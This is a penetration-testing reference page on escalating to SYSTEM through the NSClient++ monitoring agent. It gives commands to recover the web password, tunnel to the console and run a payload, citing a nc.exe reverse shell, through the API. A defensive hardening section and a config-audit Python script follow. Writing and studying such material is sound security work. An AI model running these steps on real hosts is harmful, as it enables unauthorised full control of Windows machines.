NSClient++
aka nscp
Windows monitoring agent (Nagios/NSCP) running as SYSTEM, web UI on 8443. Recover its web password from nsclient.ini, reach the often localhost-only console via a tunnel, then run an external script as SYSTEM.
Ports
| Port | Proto | Notes |
|---|---|---|
| 8443 | tcp | NSClient++ web console (HTTPS) |
| 12489 | tcp | Legacy check port |
Fingerprint
- Self-signed cert / 'NSClient++' web UI on 8443
- C:\Program Files\NSClient++ on disk
Key files
| Path | Holds | Sensitive |
|---|---|---|
| C:\Program Files\NSClient++\nsclient.ini | web admin password, allowed hosts | sensitive |
Exploitation primitives
- Read the web password from nsclient.ini (or `nscp.exe web -- password --display`)
- Console is usually 'allowed hosts = 127.0.0.1' — SSH/port-forward to reach it from localhost
- Define an external script + schedule it via the API; NSClient++ runs as SYSTEM, so the script does too
Overview
NSClient++ is a Windows monitoring agent that runs as NT AUTHORITY\SYSTEM. Controlling its web console (8443) means SYSTEM — the only hurdle is the password and the localhost-only restriction.
Recover the web password
gc "C:\Program Files\NSClient++\nsclient.ini"
Or via the binary:
cmd /c "C:\Program Files\NSClient++\nscp.exe" web -- password --display
Reach the localhost-only console
`allowed hosts = 127.0.0.1` blocks remote access, so tunnel to it:
ssh -L 8443:127.0.0.1:8443 user@<TARGET>
Then log in at https://localhost:8443.
Run a script as SYSTEM
Drop a payload on disk, then in the console add it under Settings → external scripts → scripts, save the config, reload, and trigger the check via the API:
curl -sk -u admin:<PASSWORD> "https://localhost:8443/api/v1/queries/pwn/commands/execute?time=1m"
The script (e.g. a nc.exe reverse shell) executes as SYSTEM.
Hardening
Set a strong web password, keep allowed hosts tight, disable external scripts, and run the agent under a least-privilege account where possible.
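A way to check a host's nsclient.ini against the hardening points above, as an added example that is not part of the original page or of NSClient++ itself. Apart from `allowed hosts`, the section and key names (`/modules`, `/settings/default`, `/settings/WEB/server`, `CheckExternalScripts`, `/settings/external scripts/scripts`) and the 16-character threshold are assumptions; adjust them to the file you are auditing.

```python
import configparser

# Constructed sample config, not taken from a real host. Section and key names
# follow the usual nsclient.ini layout and are assumptions; adjust to your file.
SAMPLE_INI = r"""
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled

[/settings/default]
password = changeme1
allowed hosts = 127.0.0.1,10.0.0.0/8

[/settings/external scripts/scripts]
disk_report = scripts\disk_report.bat
"""

ENABLED = {"enabled", "1", "true"}
LOCAL = {"127.0.0.1", "::1", "localhost"}

def audit(ini_text, min_password_len=16):
    """Return a list of hardening findings for an nsclient.ini body."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False,
                                    allow_no_value=True)
    cfg.read_string(ini_text)
    findings = []
    modules = cfg["/modules"] if cfg.has_section("/modules") else {}
    # Password and allowed hosts may sit in the default or the web server section.
    for section in ("/settings/default", "/settings/WEB/server"):
        if not cfg.has_section(section):
            continue
        pw = cfg.get(section, "password", fallback=None)
        if pw is not None and len(pw) < min_password_len:
            findings.append(f"{section}: password shorter than {min_password_len} chars")
        hosts = cfg.get(section, "allowed hosts", fallback="") or ""
        extra = [h.strip() for h in hosts.split(",")
                 if h.strip() and h.strip() not in LOCAL]
        if extra:
            findings.append(f"{section}: non-local allowed hosts {extra}")
    # External scripts are what turn console access into command execution as SYSTEM.
    if (modules.get("CheckExternalScripts") or "").lower() in ENABLED:
        findings.append("/modules: CheckExternalScripts is enabled")
    scripts = "/settings/external scripts/scripts"
    if cfg.has_section(scripts):
        for name, command in cfg.items(scripts):
            findings.append(f"{scripts}: '{name}' runs {command!r}")
    return findings
```

Every registered script is listed rather than judged, so the output can be compared with the set of checks the monitoring team actually expects on that host.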